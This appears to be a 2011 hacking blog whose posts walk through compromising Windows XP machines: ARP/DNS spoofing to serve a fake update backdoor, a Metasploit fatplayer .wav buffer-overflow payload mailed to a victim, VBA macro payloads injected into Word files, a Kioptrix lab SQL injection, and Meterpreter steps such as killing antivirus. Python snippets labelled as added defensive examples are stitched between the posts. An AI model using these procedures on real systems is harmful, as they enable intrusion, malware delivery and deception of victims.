Tuesday, 26 July 2011

owning Win XP using fake updates



watch the video online: http://blip.tv/jac0bn3t/backtrack-fake-updats-54
download the video: http://blip.tv/file/get/Jac0bn3t-backtrackFakeUpdats710.mp4
download the index.php + pictures: http://www.mediafire.com/?oh9d6mhj3sjm7ak

what I have used:
OS: BackTrack and Win XP
Camtasia Studio recorder and editor
all other tools can be found on BackTrack 5

hacking steps:
*the attacker wants to hack the victim's computer
*the victim and the attacker are on the same network
*the attacker scans for live hosts using nmap
*nice, he found the victim's IP: 192.168.1.105
*then the attacker wants to serve a fake update to the system (I have chosen Windows; you can choose any OS, Linux or OS X, since the index.php is able to detect which system the user is running)
*I have created a Windows backdoor.exe and pasted it into the web directory /var/www
*I have copied the pictures into the web directory /var/www too
*I have started my HTTP server using Apache: "service apache2 start"
*so now I have a server on 192.168.1.106 that anyone is allowed to reach
*but how to change the victim's request for a website and send it back to mine, "http://192.168.1.106"?
*I use ettercap and dnsspoof
*ettercap:
* -i eth0 (your interface can be found using ifconfig)
* -T (for text mode)
* -M (for choosing the sniffing mode)
* arp:remote (the sniffing mode that is able to change the path the packets take)
* /victim ip/ /router ip/ (the router IP can be found using route -n)
*dnsspoof
*create a list of the hosts you expect the victim to visit; he will then be redirected to your server
* -i eth0 (choose whatever your interface is)
* -f /directory of the text file that you have created
*start listening in Metasploit
*and voilà: every time the victim visits a website he will be redirected to your website; after he sees the page (which you can edit as you want), he clicks the download button, gets the backdoor you created, and you get a Meterpreter session. Very easy and nice.
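From the defender's side, the dnsspoof step above leaves a clear trace: many unrelated public names suddenly resolve to one private LAN address. The following Python script is an added example, not part of the original post; it parses resolver answers in a constructed log format and flags a private IP that is handed out as the answer for several non-local names.

```python
"""Added example (not from the original post): flag DNS answers that look like
dnsspoof-style redirection, where every host in the attacker's list resolves
to a single LAN address. The log format below is constructed for this demo."""
import ipaddress
from collections import defaultdict

# Constructed sample of resolver answers: "client query -> answer_ip".
SAMPLE_LOG = """\
192.168.1.105 www.google.com -> 142.250.74.36
192.168.1.105 update.microsoft.com -> 192.168.1.106
192.168.1.105 www.facebook.com -> 192.168.1.106
192.168.1.105 windowsupdate.com -> 192.168.1.106
192.168.1.105 intranet.local -> 192.168.1.10
192.168.1.107 www.google.com -> 142.250.74.36
"""

def parse_answers(log_text):
    """Yield (client, name, answer_ip) tuples from the constructed log format."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "->":
            continue                     # skip anything that is not an answer line
        yield parts[0], parts[1], parts[3]

def is_local_name(name):
    """Names a LAN resolver is expected to answer with private addresses."""
    return name.endswith((".local", ".lan", ".home"))

def suspicious_answers(log_text, min_names=2):
    """Return {private_ip: sorted public names} for every private address that
    was given as the answer for at least min_names distinct non-local names."""
    names_by_ip = defaultdict(set)
    for _client, name, answer in parse_answers(log_text):
        try:
            ip = ipaddress.ip_address(answer)
        except ValueError:
            continue                     # malformed answer, ignore
        if ip.is_private and not is_local_name(name):
            names_by_ip[answer].add(name)
    return {ip: sorted(names) for ip, names in names_by_ip.items()
            if len(names) >= min_names}

if __name__ == "__main__":
    for ip, names in suspicious_answers(SAMPLE_LOG).items():
        print(f"possible DNS spoofing: {ip} answered for {', '.join(names)}")
```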




notes:
*sorry for my bad English and ....

music: Dash Berlin feat. Emma Hewitt - Waiting

Monday, 18 July 2011

Owning Kioptrix Level 3



Introduction:
Kioptrix is a vulnerable-by-design OS made for us to practise penetration testing on

view the video online : http://blip.tv/jac0bn3t/owning-kioptrix-level-3-5385433
download the video : http://blip.tv/file/get/Jac0bn3t-OwningKioptrixLevel3489.mp4

what I have used in this video:

*OS: BackTrack 5 and Kioptrix
*Camtasia Studio recorder and editor
*all other software can be found on BackTrack (to put it simply, BackTrack 5 is the best)
*md5decrypter.co.uk (online MD5 hash "decrypter", really a lookup table)

hacking steps:

*first we scan for live hosts using nmap:
"nmap -sn -n 192.168.1.100/24" (this 192.168.*.* range depends on your DHCP server)
*ok, our target is alive
*let's scan for open ports and the version behind every port:
"nmap -sS -sV 192.168.1.106 -n"
*nice, we have port 80 (httpd) open and port 22 (ssh) open
*let's go and check this web page (a lot of pages and links)
*the attacker wants to know all the pages of this website
*I have used DirBuster to scan this website and I can see that there is a page /gallery
*so let's check the source code of this page
*we find that the website is powered by a gallery manager, "Gallarific"
*ok, the attacker needs an exploit; for me it's exploit-db.com
*nice, this web application is vulnerable, with a possible SQLi vulnerability
*how to inject the website: the way is shown in the video from 3:00 to 7:18
*ok, nice, we have the SSH usernames and passwords
*but the passwords are hashed with MD5, so we need to reverse the hash
*for me it's md5decrypter.co.uk; you can choose any online MD5 decrypter
*and there we go, we have the real passwords; now let's connect to this system:
"ssh 192.168.1.106 -l loneferret"
*it will ask you for a password; the password is what the decrypter found: "starwars"
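The reason the online "decrypter" works so well here is that the gallery app stored unsalted MD5: every user who picked the same password gets the same digest, so one precomputed table answers all of them. The Python below is an added example, not code from the original post or from Kioptrix; it puts that weak scheme beside a salted PBKDF2 store (assumed here as the hardened form) on a constructed user table.

```python
"""Added example (not from the original post): unsalted MD5 versus a per-user
salt plus PBKDF2-HMAC-SHA256. The user table and the second account are
constructed; "starwars" is the password recovered in the post."""
import hashlib
import hmac
import os

def md5_store(password):
    """Weak scheme (what the gallery app used): unsalted MD5, 32 hex chars."""
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_store(password, salt=None, iterations=200_000):
    """Hardened scheme: 16 random salt bytes + PBKDF2-HMAC-SHA256, stored as
    'pbkdf2_sha256$iterations$salt_hex$digest_hex'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

def reused_digests(user_table):
    """Stored values shared by more than one user in a {user: stored} table.
    With MD5 every shared password shows up here (one lookup hit opens all of
    those accounts); with salted PBKDF2 the result is empty even when two
    users chose the same password."""
    owners = {}
    for user, stored in user_table.items():
        owners.setdefault(stored, []).append(user)
    return {h: sorted(u) for h, u in owners.items() if len(u) > 1}

# Constructed user table: two accounts that picked the same password.
USERS = {"loneferret": "starwars", "bob": "starwars", "admin": "hunter2"}
MD5_TABLE = {u: md5_store(p) for u, p in USERS.items()}
PBKDF2_TABLE = {u: pbkdf2_store(p) for u, p in USERS.items()}

if __name__ == "__main__":
    print("MD5 digests shared between users:", reused_digests(MD5_TABLE))
    print("PBKDF2 values shared between users:", reused_digests(PBKDF2_TABLE))
```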

notes:
*sorry for my bad English
*BackTrack 5 has bad transparency; I'm working on the theme

Friday, 15 July 2011

metasploit vs fatplayer


view the video online: http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533
download the video: http://blip.tv/file/get/Jac0bn3t-metasploitFatplayerBufferOverview350.mp4

what I have used:

Metasploit
OS: BackTrack 5 and Win XP SP3
fatplayer
Camtasia recorder
Mozilla Firefox

hacking steps:

*I have looked for a vulnerable music player and found that fatplayer (the 06b version) is vulnerable to a buffer overflow, so I have created the backdoor in the .wav file format. nice

*start msfconsole

*the exploit is: windows/fileformat/fatplayer_wav

*the commands for creating the backdoor are:
   *set FILENAME yourfilename.wav (I have named it playme.wav)
   *set OUTPUTPATH /root directory
   *payload: windows/meterpreter/reverse_tcp
   *lhost = your IP (found using ifconfig)
   *lport = any port you want to listen on (for me it is 8080)
   *exploit, to create the backdoor in .wav file format

*download the vulnerable fatplayer 0.6

*rename your fatplayer_win32.exe and backdoor.wav with any names you choose (for me it is "fatplayer_win32.exe ======> fatplayer.exe" and "backdoor.wav =======> playme.wav")

*start the apache2 server (all commands can be found at the end of the post)

*place your fatplayer_win.exe and backdoor.wav in "/var/www" to be easy to share with your victim

*social-engineer your victim by sending an email with your email manager (for me it is ssmtp) containing the IP address of your Apache server (your IP address can be found using ifconfig), like this: yourip/backdoor.wav and yourip/fatplayer.exe

*listen on the port that we created the backdoor with (for me it's 8080)
   *use exploit/multi/handler
   *set lport = the port that you used to create the payload (for me it is 8080)
   *set lhost = your IP address (you can find it using ifconfig)
   *exploit (waiting for the victim to play the music)

*after the victim plays the music you will get a Meterpreter session open

*run some exciting scripts in Meterpreter
   *run checkvm: to know if the system is a virtual machine
   *run killav: to kill antivirus services
   *shell -i: to get the system shell
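What makes a file-format exploit like this one possible is a player that trusts the sizes written in the file. The Python below is an added example, not code from the original post or from fatplayer; it walks the RIFF chunks of a .wav and rejects any chunk whose declared length does not fit inside the file, the sanity check whose absence lets a lying header drive a copy past a fixed-size buffer. It does not reproduce the actual fatplayer bug, and the files it checks are constructed.

```python
"""Added example (not from the original post): bounds-checked RIFF/WAVE chunk
walking, i.e. the validation a player should do before trusting chunk sizes.
Sample files are constructed; the real fatplayer trigger is not reproduced."""
import struct

def riff_chunks(blob):
    """Yield (chunk_id, payload) for each chunk; raise ValueError as soon as a
    declared size would run past the end of the data."""
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    riff_len = struct.unpack_from("<I", blob, 4)[0]
    if riff_len + 8 > len(blob):
        raise ValueError(f"RIFF size {riff_len} exceeds file of {len(blob)} bytes")
    pos = 12
    while pos + 8 <= len(blob):
        cid, clen = struct.unpack_from("<4sI", blob, pos)
        if pos + 8 + clen > len(blob):
            raise ValueError(f"chunk {cid!r} claims {clen} bytes, "
                             f"only {len(blob) - pos - 8} remain")
        yield cid, blob[pos + 8:pos + 8 + clen]
        pos += 8 + clen + (clen & 1)          # chunk payloads are word-aligned

def is_well_formed(blob):
    """True when every chunk fits and both 'fmt ' and 'data' are present."""
    try:
        ids = [cid for cid, _ in riff_chunks(blob)]
    except ValueError:
        return False
    return b"fmt " in ids and b"data" in ids

def build_wav(samples, data_len_field=None):
    """Construct a tiny 8-bit mono PCM wav. data_len_field lets the caller
    write a lying 'data' size, the way a crafted file would."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)   # PCM, mono, 8 kHz
    data_len = len(samples) if data_len_field is None else data_len_field
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", data_len) + samples)
    return b"RIFF" + struct.pack("<I", len(body)) + body

if __name__ == "__main__":
    good = build_wav(bytes(range(16)))
    bad = build_wav(bytes(range(16)), data_len_field=0xFFFFFFF0)
    print("honest file:", is_well_formed(good), "| lying header:", is_well_formed(bad))
```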

THE COMMANDS ARE:
cp: to copy and paste, e.g. cp /root/mydata.txt /etc/init.d/mydata.txt
mv: to rename a file: mv mydata.txt data.txt
service apache2 start: to start Apache


Music: by Savage Garden
  *Santa Monica
  *Animal Song

Thursday, 14 July 2011

install BackTrack 5 on VMware Workstation

BackTrack: setup and introduction



view the video online: http://blip.tv/jac0bn3t/install-backtrack-5-5349969
download the video: http://blip.tv/file/get/Jac0bn3t-installBacktrack5563.avi

what I have used
VMware Workstation (you can use VMware Player or VirtualBox with a free license)
CamStudio recorder
Camtasia video editor



this is how I installed BackTrack, my way:

*first you need plenty of RAM, because BackTrack is based on Ubuntu, so at least 2 GB of physical RAM
*give your virtual machine 512 MB of RAM
*once everything is done, start your virtual machine and boot it
*startx to begin graphical mode, then start the installer, follow me, and there we go, we're done

Music: Infected Mushroom - Project 100

Wednesday, 13 July 2011

Microsoft Office files: injecting VB scripts

video url: http://blip.tv/jac0bn3t/office-files-injecting-vb-scripts-5370003
download url: http://blip.tv/file/get/Jac0bn3t-officeFilesInjectingVbScripts859.mp4


what I have used:
*Samba client
*Metasploit
*OS: BackTrack 5 and Win XP SP2 and SP3
*Microsoft Office Word 2003
*video recording and editing with Camtasia Studio

steps:
*the backdoor was a '.doc' format file and not a '.exe', since I know that the victim
has Microsoft Office installed, and almost all antiviruses detect .exe files

*I have created, using Metasploit, a payload (windows/meterpreter/reverse_tcp) with
      --lhost (0.0.0.0)
      --lport (8080 | you can choose any port you want to listen on)
      --encoder "shikata_ga_nai", to create a VBScript to inject into the doc file, and put it in my local web directory to be easy to share with my "helper machine". Then I copied the VB code that Metasploit generated and injected it into a .doc file, which I put into a shared directory over the network 192.168.*.* (the doc directory). Then I used the Samba client to connect from my BackTrack machine to this shared folder (doc directory).

*I have copied the *.doc file that I injected from the shared directory, using "cp", to my local web folder (/var/www)
to be easy for the victim to download
*then I sent a message to my victim with the IP of my server, which I had started using (/etc/init.d/apache2 start)
I have begun listening on the lhost, lport and payload that I used to create the payload,
using exploit multi/handler in Metasploit, and

*waiting for the victim to connect back

*after the victim reads the message, downloads the .doc file and runs it, I'm going to get access to the system with a Meterpreter session open and run a shell